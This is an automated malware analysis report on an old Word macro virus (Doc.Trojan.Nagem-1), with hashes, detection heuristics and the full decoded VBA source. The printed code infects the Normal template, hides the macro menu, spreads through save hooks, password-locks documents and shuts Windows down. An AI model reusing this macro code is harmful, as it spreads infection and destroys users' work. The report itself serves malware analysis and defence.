Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 79ccb83d6a165520…

MALICIOUS

Office (OLE)

60.5 KB Created: 2001-01-12 09:02:00 Authoring application: Microsoft Word 9.0 First seen: 2015-09-30
MD5: a97bb5543bc31d9025aaa646627db4e0 SHA-1: c4f38c74fb201d279e0be7c67c39a364b3c72268 SHA-256: 79ccb83d6a16552002a0dd4a7693e8e0976b042476d497e9df0d5fcef1d7e0f8
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, identified by ClamAV as Doc.Trojan.Nagem-1. The AutoOpen macro attempts to infect the Normal.dot template by exporting and importing the 'Magan_Macro' component, a common technique for establishing persistence or spreading malware. The presence of legacy WordBasic markers and the AutoOpen/Auto_Close macros further indicate a macro-based threat.

Heuristics 6

  • ClamAV: Doc.Trojan.Nagem-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nagem-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
           Shell "RunDLL.EXE USER,ExitWindows", vbHide
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3508 bytes
SHA-256: 56c4b59354097f09bc2b189adca38501d8e560f4c31601415f5f7871ba425fc9
Detection
ClamAV: Doc.Trojan.Nagem-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Magan_Macro"
' Distributed for Changes/Upgradation etc. in
'Open Source Code.
' If you are interested in developing,modifying,
'crypting etc. this document using your skills,
'you are FREE to do so.
' Don't forget to give credits also to
'"Anonymous Creater of Megan V1.0"
' Nick of course is Magan
' Best of Luck
' Explanation Also Included.

Dim Ni, Di As Integer
Sub AutoOpen()
'There are no destructive routines in
'this document.
On Error GoTo 1

'Find if Normal is already infected!
With Normal.ThisDocument.VBProject.VBComponents
    For Ni = 1 To .Count
            If (.Item(Ni).Name = "Magan_Macro") Then
                GoTo 3
            End If
    Next Ni
End With

'Infect Normal
With ThisDocument.VBProject.VBComponents
    For Di = 1 To .Count
       If (.Item(Di).Name = "Magan_Macro") Then
          .Item(Di).Export ("MaganM.BAS")
          ' I know that the above is not the best way, still,
          'It is the easiest to understand.
          Normal.ThisDocument.VBProject.VBComponents.Add(1).CodeModule.AddFromFile ("MaganM.BAS")
          Kill ("MaganM.BAS")
          Exit For
       End If
Next Di
End With

GoTo 2

3

With ActiveDocument.VBProject.VBComponents
For Ni = 1 To .Count
            If (.Item(Ni).Name = "Magan_Macro") Then
                GoTo 1
            End If
Next Ni
End With

With Normal.ThisDocument.VBProject.VBComponents
For Di = 1 To .Count
       If (.Item(Di).Name = "Magan_Macro") Then
          .Item(Di).Export ("MaganM.BAS")
          ActiveDocument.VBProject.VBComponents.Add(1).CodeModule.AddFromFile ("MaganM.BAS")
          Kill ("MaganM.BAS")
          Exit For
       End If
Next Di
End With
ActiveDocument.Saved = False
2
Normal.ThisDocument.Saved = False
1
End Sub

Sub ToolsMacro()
Attribute ToolsMacro.VB_Description = "Disables the Tools->Macro->Macros... command under English version of Word."
Attribute ToolsMacro.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.ToolsMacro1"
'This macro disables the Tools->Macros->Macros...
'Command under English version of Word.

'If you are here, you know the in and out of the
'macro programming i belive.
MsgBox "This Command is Unavaliable this time.", vbCritical, "Microsoft Word"
End Sub


Sub AutoClose()
'No fun without an activation routine.
On Error Resume Next
If (Val(Left$(Date$, 2)) > 20) Then
    'Change "password" to Rnd*100 if you like!
    'Then, the document can never be unprotected again.
    ActiveDocument.Protect wdAllowOnlyComments, , "password"
End If
If (Val(Left$(Date$, 2)) > 10) Then
    If (Rnd * 100 < 50) Then
       'Quits without saving :)
       'Then tries Restarts the Computer
       'Restart works only if there is a delay
       Shell "RunDLL.EXE USER,ExitWindows", vbHide
       ThisDocument.Application.Quit
    End If
End If
End Sub

Sub FileSave()
'Just to Spread.
'Note : Works only under English Version.
On Error Resume Next
AutoOpen
ActiveDocument.Save
End Sub

Sub FileSaveAs()
'Just to Spread.
'Note : Works only under English Version.
On Error Resume Next
AutoOpen
Dialogs(wdDialogFileSaveAs).Show
AutoOpen
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.